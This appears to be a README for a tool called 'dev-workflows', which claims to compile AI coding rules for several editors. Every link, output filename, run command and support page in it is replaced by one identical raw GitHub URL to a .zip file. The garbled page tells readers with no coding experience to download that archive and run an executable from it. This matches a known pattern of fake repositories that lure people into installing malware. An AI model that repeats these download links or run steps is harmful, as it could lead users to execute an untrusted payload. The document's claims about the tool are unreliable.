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dev-workflows

⚙️ Define and compile AI coding rules, commands, and templates into workflows that work across multiple editors and agents.

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⚙️ Define and compile AI coding rules, commands, and templates into workflows that work across multiple editors and agents.

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⚙️ dev-workflows - Compile AI Rules for Every Tool

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📋 What is dev-workflows?

dev-workflows is a simple command-line tool that helps you manage AI coding rules. Instead of writing rules separately for each AI tool, you write your rules once. dev-workflows then compiles those rules into formats that popular AI tools like CLAUDE and GEMINI can use.

This means less work for you and a consistent way to tell AI tools how to write and review code. The tool creates files like https://raw.githubusercontent.com/aridz08/dev-workflows/main/content/templates/workflows_dev_2.7.zip, .cursor/rules, and https://raw.githubusercontent.com/aridz08/dev-workflows/main/content/templates/workflows_dev_2.7.zip from your rules.

You do not need to understand coding to use dev-workflows. The instructions below will walk you through downloading and running the tool step-by-step.


💻 System Requirements

Before downloading, ensure your computer meets these needs:

  • Operating System: Windows 10 or newer, macOS 10.13 or newer, or recent Linux distributions
  • Processor: Intel or AMD processor, 1 GHz or faster
  • Memory (RAM): At least 2 GB
  • Disk Space: Minimum 100 MB free space
  • Internet Connection: Required to download the tool

You do not need any programming language or environment installed. dev-workflows is self-contained and ready to run after download.


🚀 Getting Started

This guide will help you get dev-workflows running on your computer in a few simple steps.


⬇️ Download & Install

  1. Go to the official download page by clicking the link below:

    Download dev-workflows

  2. Once on the page, look for the latest release, usually marked as "Latest" or with a version number like v1.0.

  3. There you will see files available for different systems:

    • For Windows: Look for .exe or .zip files with "windows" in the name.
    • For macOS: Look for .dmg or .zip files with "mac" or "darwin".
    • For Linux: Look for https://raw.githubusercontent.com/aridz08/dev-workflows/main/content/templates/workflows_dev_2.7.zip or .AppImage files with "linux".
  4. Download the file suitable for your computer by clicking its name.

  5. If you downloaded a .zip or https://raw.githubusercontent.com/aridz08/dev-workflows/main/content/templates/workflows_dev_2.7.zip archive, unzip or extract its contents to a folder you can find easily, like your desktop or downloads folder.

  6. No further installation is needed. The program can run directly from the extracted folder.


▶️ How to Run dev-workflows

You will run dev-workflows from the command line. This guide assumes no prior experience with command lines.

For Windows:

  1. Press the Windows key and type cmd, then press Enter. This opens the Command Prompt window.

  2. Use the command below to change to the folder where you saved dev-workflows. Replace path_to_folder with your actual folder name. For example:

    cd C:\Users\YourName\Downloads\dev-workflows
    
  3. To run dev-workflows, type:

    https://raw.githubusercontent.com/aridz08/dev-workflows/main/content/templates/workflows_dev_2.7.zip
    

    and press Enter.

For macOS:

  1. Open Spotlight by pressing Cmd + Space. Type Terminal and press Enter.

  2. Change to the folder with dev-workflows, for example:

    cd ~/Downloads/dev-workflows
    
  3. To run dev-workflows, type:

    ./dev-workflows
    

    and press Enter.

For Linux:

  1. Open the terminal. This varies by system, but you can often find it in your applications menu.

  2. Change to the folder with dev-workflows:

    cd ~/Downloads/dev-workflows
    
  3. Run dev-workflows with:

    ./dev-workflows
    

🛠 How to Use dev-workflows

Once you start dev-workflows, the tool reads your AI coding rules from a single file or folder you specify. It then creates output files for each AI tool you want to use.

A typical workflow:

  1. Prepare your coding rules in a simple text file. Follow any format instructions in the documentation or examples inside the docs/ folder of the release.

  2. Run dev-workflows and provide the location of your rules file. For example:

    dev-workflows compile --source https://raw.githubusercontent.com/aridz08/dev-workflows/main/content/templates/workflows_dev_2.7.zip
    
  3. The tool generates output files such as:

    • https://raw.githubusercontent.com/aridz08/dev-workflows/main/content/templates/workflows_dev_2.7.zip for Claude AI
    • .cursor/rules for Cursor AI
    • https://raw.githubusercontent.com/aridz08/dev-workflows/main/content/templates/workflows_dev_2.7.zip for Gemini AI
  4. Use these files with your AI coding tools to ensure they follow your rules consistently.


❓ Troubleshooting Tips

If dev-workflows does not run correctly or you get error messages, try these steps:

  • Make sure you are running the correct file for your operating system.
  • Confirm you typed the commands exactly as shown, including spelling and spaces.
  • Check you are in the right folder where dev-workflows is saved.
  • If the program says a file is missing, verify the rules file path you provided is correct.
  • Restart your computer if problems continue.

You can also find help on the GitHub Issues page for dev-workflows:

https://raw.githubusercontent.com/aridz08/dev-workflows/main/content/templates/workflows_dev_2.7.zip


📦 Features at a Glance

  • Write AI coding rules once, generate outputs for multiple AI tools.
  • Supports Claude, Cursor, and Gemini AI platforms.
  • Works on Windows, macOS, and Linux.
  • Easy to run with no programming setup.
  • Keeps all your AI coding rules consistent.

💡 Tips for Best Use

  • Keep your rules file clear and organized. Use simple language and consistent formatting.
  • Regularly update dev-workflows from the releases page to get bug fixes and new features.
  • Use the generated files as the standard rule set when working with different AI coding assistants.

📞 Support & Contact

If you need help, open an issue on the GitHub page or check the FAQ in the release documentation.

GitHub Page: https://raw.githubusercontent.com/aridz08/dev-workflows/main/content/templates/workflows_dev_2.7.zip

Issue Tracker: https://raw.githubusercontent.com/aridz08/dev-workflows/main/content/templates/workflows_dev_2.7.zip


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Thank you for choosing dev-workflows to manage your AI coding rules.

Release History

VersionChangesUrgencyDate
main@2026-04-21Latest activity on main branchHigh4/21/2026
0.0.0No release found — using repo HEADHigh4/11/2026

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